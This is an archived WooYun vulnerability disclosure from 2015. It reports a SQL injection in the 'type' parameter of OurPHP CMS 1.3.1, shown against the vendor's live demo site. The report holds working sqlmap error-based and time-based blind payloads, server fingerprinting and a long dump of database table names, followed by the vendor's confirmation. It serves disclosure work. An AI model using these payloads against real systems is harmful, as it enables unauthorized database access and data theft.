乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-19: 细节已通知厂商并且等待厂商处理中 2015-08-19: 厂商已经确认,细节仅向厂商公开 2015-08-29: 细节向核心白帽子及相关领域专家公开 2015-09-08: 细节向普通白帽子公开 2015-09-18: 细节向实习白帽子公开 2015-10-03: 细节向公众公开
rt
最新版本:V1.3.1更新日期:2015-07-27就拿官网demo复现。http://demo.ourphp.net/?cn-product-23.html=&type=a 发现type参数有问题。
---Parameter: type (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cn-product-23.html=&type=a AND (SELECT 6513 FROM(SELECT COUNT(*),CONCAT(0x716b787871,(SELECT (ELT(6513=6513,1))),0x71627a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cn-product-23.html=&type=a AND (SELECT * FROM (SELECT(SLEEP(5)))RWCY)---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0back-end DBMS: MySQL 5.0current user: 'ourphp@localhost'current user is DBA: Falseavailable databases [2]:[*] information_schema[*] ourphpDatabase: ourphp[343 tables]+----------------------------------+| dz_baidusubmit_setting || dz_baidusubmit_sitemap || dz_baidusubmit_urlstat || dz_common_admincp_cmenu || dz_common_admincp_group || dz_common_admincp_member || dz_common_admincp_perm || dz_common_admincp_session || dz_common_admingroup || dz_common_adminnote || dz_common_advertisement || dz_common_advertisement_custom || dz_common_banned || dz_common_block || dz_common_block_favorite || dz_common_block_item || dz_common_block_item_data || dz_common_block_permission || dz_common_block_pic || dz_common_block_style || dz_common_block_xml || dz_common_cache || dz_common_card || dz_common_card_log || dz_common_card_type || dz_common_connect_guest || dz_common_credit_log || dz_common_credit_log_field || dz_common_credit_rule || dz_common_credit_rule_log || dz_common_credit_rule_log_field || dz_common_cron || dz_common_devicetoken || dz_common_district || dz_common_diy_data || dz_common_domain || dz_common_failedip || dz_common_failedlogin || dz_common_friendlink || dz_common_grouppm || dz_common_invite || dz_common_magic || dz_common_magiclog || dz_common_mailcron || dz_common_mailqueue || dz_common_member || dz_common_member_action_log || dz_common_member_connect || dz_common_member_count || dz_common_member_crime || dz_common_member_field_forum || dz_common_member_field_home || dz_common_member_forum_buylog || dz_common_member_grouppm || dz_common_member_log || dz_common_member_magic || dz_common_member_medal || dz_common_member_newprompt || dz_common_member_profile || dz_common_member_profile_setting || dz_common_member_security || dz_common_member_secwhite || dz_common_member_stat_field || dz_common_member_status || dz_common_member_validate || dz_common_member_verify || dz_common_member_verify_info || dz_common_member_wechat || dz_common_member_wechatmp || dz_common_myapp || dz_common_myinvite || dz_common_mytask || dz_common_nav || dz_common_onlinetime || dz_common_optimizer || dz_common_patch || dz_common_plugin || dz_common_pluginvar || dz_common_process || dz_common_regip || dz_common_relatedlink || dz_common_remote_port || dz_common_report || dz_common_searchindex || dz_common_seccheck || dz_common_secquestion || dz_common_session || dz_common_setting || dz_common_smiley || dz_common_sphinxcounter || dz_common_stat || dz_common_statuser || dz_common_style || dz_common_stylevar || dz_common_syscache || dz_common_tag || dz_common_tagitem || dz_common_task || dz_common_taskvar || dz_common_template || dz_common_template_block || dz_common_template_permission || dz_common_uin_black || dz_common_usergroup || dz_common_usergroup_field || dz_common_visit || dz_common_word || dz_common_word_type || dz_connect_disktask || dz_connect_feedlog || dz_connect_memberbindlog || dz_connect_postfeedlog || dz_connect_tthreadlog || dz_forum_access || dz_forum_activity || dz_forum_activityapply || dz_forum_announcement || dz_forum_attachment || dz_forum_attachment_0 || dz_forum_attachment_1 || dz_forum_attachment_2 || dz_forum_attachment_3 || dz_forum_attachment_4 || dz_forum_attachment_5 || dz_forum_attachment_6 || dz_forum_attachment_7 || dz_forum_attachment_8 || dz_forum_attachment_9 || dz_forum_attachment_exif || dz_forum_attachment_unused || dz_forum_attachtype || dz_forum_bbcode || dz_forum_collection || dz_forum_collectioncomment || dz_forum_collectionfollow || dz_forum_collectioninvite || dz_forum_collectionrelated || dz_forum_collectionteamworker || dz_forum_collectionthread || dz_forum_creditslog || dz_forum_debate || dz_forum_debatepost || dz_forum_faq || dz_forum_filter_post || dz_forum_forum || dz_forum_forum_threadtable || dz_forum_forumfield || dz_forum_forumrecommend || dz_forum_groupcreditslog || dz_forum_groupfield || dz_forum_groupinvite || dz_forum_grouplevel || dz_forum_groupuser || dz_forum_hotreply_member || dz_forum_hotreply_number || dz_forum_imagetype || dz_forum_medal || dz_forum_medallog || dz_forum_memberrecommend || dz_forum_moderator || dz_forum_modwork || dz_forum_newthread || dz_forum_onlinelist || dz_forum_optionvalue1 || dz_forum_order || dz_forum_poll || dz_forum_polloption || dz_forum_polloption_image || dz_forum_pollvoter || dz_forum_post || dz_forum_post_location || dz_forum_post_moderate || dz_forum_post_tableid || dz_forum_postcache || dz_forum_postcomment || dz_forum_postlog || dz_forum_poststick || dz_forum_promotion || dz_forum_ratelog || dz_forum_relatedthread || dz_forum_replycredit || dz_forum_rsscache || dz_forum_sofa || dz_forum_spacecache || dz_forum_statlog || dz_forum_thread || dz_forum_thread_moderate || dz_forum_threadaddviews || dz_forum_threadcalendar || dz_forum_threadclass || dz_forum_threadclosed || dz_forum_threaddisablepos || dz_forum_threadhidelog || dz_forum_threadhot || dz_forum_threadimage || dz_forum_threadlog || dz_forum_threadmod || dz_forum_threadpartake || dz_forum_threadpreview || dz_forum_threadprofile || dz_forum_threadprofile_group || dz_forum_threadrush || dz_forum_threadtype || dz_forum_trade || dz_forum_tradecomment || dz_forum_tradelog || dz_forum_typeoption || dz_forum_typeoptionvar || dz_forum_typevar || dz_forum_warning || dz_home_album || dz_home_album_category || dz_home_appcreditlog || dz_home_blacklist || dz_home_blog || dz_home_blog_category || dz_home_blog_moderate || dz_home_blogfield || dz_home_class || dz_home_click || dz_home_clickuser || dz_home_comment || dz_home_comment_moderate || dz_home_docomment || dz_home_doing || dz_home_doing_moderate || dz_home_favorite || dz_home_feed || dz_home_feed_app || dz_home_follow || dz_home_follow_feed || dz_home_follow_feed_archiver || dz_home_friend || dz_home_friend_request || dz_home_friendlog || dz_home_notification || dz_home_pic || dz_home_pic_moderate || dz_home_picfield || dz_home_poke || dz_home_pokearchive || dz_home_share || dz_home_share_moderate || dz_home_show || dz_home_specialuser || dz_home_userapp || dz_home_userappfield || dz_home_visitor || dz_mobile_setting || dz_mobile_wechat_authcode || dz_mobile_wechat_masssend || dz_mobile_wechat_resource || dz_mobile_wsq_threadlist || dz_portal_article_content || dz_portal_article_count || dz_portal_article_moderate || dz_portal_article_related || dz_portal_article_title || dz_portal_article_trash || dz_portal_attachment || dz_portal_category || dz_portal_category_permission || dz_portal_comment || dz_portal_comment_moderate || dz_portal_rsscache || dz_portal_topic || dz_portal_topic_pic || dz_security_evilpost || dz_security_eviluser || dz_security_failedlog || dz_ucenter_admins || dz_ucenter_applications || dz_ucenter_badwords || dz_ucenter_domains || dz_ucenter_failedlogins || dz_ucenter_feeds || dz_ucenter_friends || dz_ucenter_mailqueue || dz_ucenter_memberfields || dz_ucenter_members || dz_ucenter_mergemembers || dz_ucenter_newpm || dz_ucenter_notelist || dz_ucenter_pm_indexes || dz_ucenter_pm_lists || dz_ucenter_pm_members || dz_ucenter_pm_messages_0 || dz_ucenter_pm_messages_1 || dz_ucenter_pm_messages_2 || dz_ucenter_pm_messages_3 || dz_ucenter_pm_messages_4 || dz_ucenter_pm_messages_5 || dz_ucenter_pm_messages_6 || dz_ucenter_pm_messages_7 || dz_ucenter_pm_messages_8 || dz_ucenter_pm_messages_9 || dz_ucenter_protectedmembers || dz_ucenter_settings || dz_ucenter_sqlcache || dz_ucenter_tags || dz_ucenter_vars || opcms_user || opcms_web || ourphp_ad || ourphp_admin || ourphp_adminclick || ourphp_api || ourphp_article || ourphp_banner || ourphp_book || ourphp_booksection || ourphp_column || ourphp_comment || ourphp_down || ourphp_freight || ourphp_integral || ourphp_job || ourphp_lang || ourphp_link || ourphp_mail || ourphp_orders || ourphp_photo || ourphp_plus || ourphp_product || ourphp_productattribute || ourphp_productcp || ourphp_productset || ourphp_productspecifications || ourphp_qq || ourphp_search || ourphp_shoppingcart || ourphp_temp || ourphp_user || ourphp_usercontrol || ourphp_userleve || ourphp_usermessage || ourphp_userpay || ourphp_userproblem || ourphp_video || ourphp_wap || ourphp_watermark || ourphp_web || ourphp_webdeploy |+----------------------------------+
~~~
危害等级:中
漏洞Rank:5
确认时间:2015-08-19 11:22
谢谢 尽快修复
暂无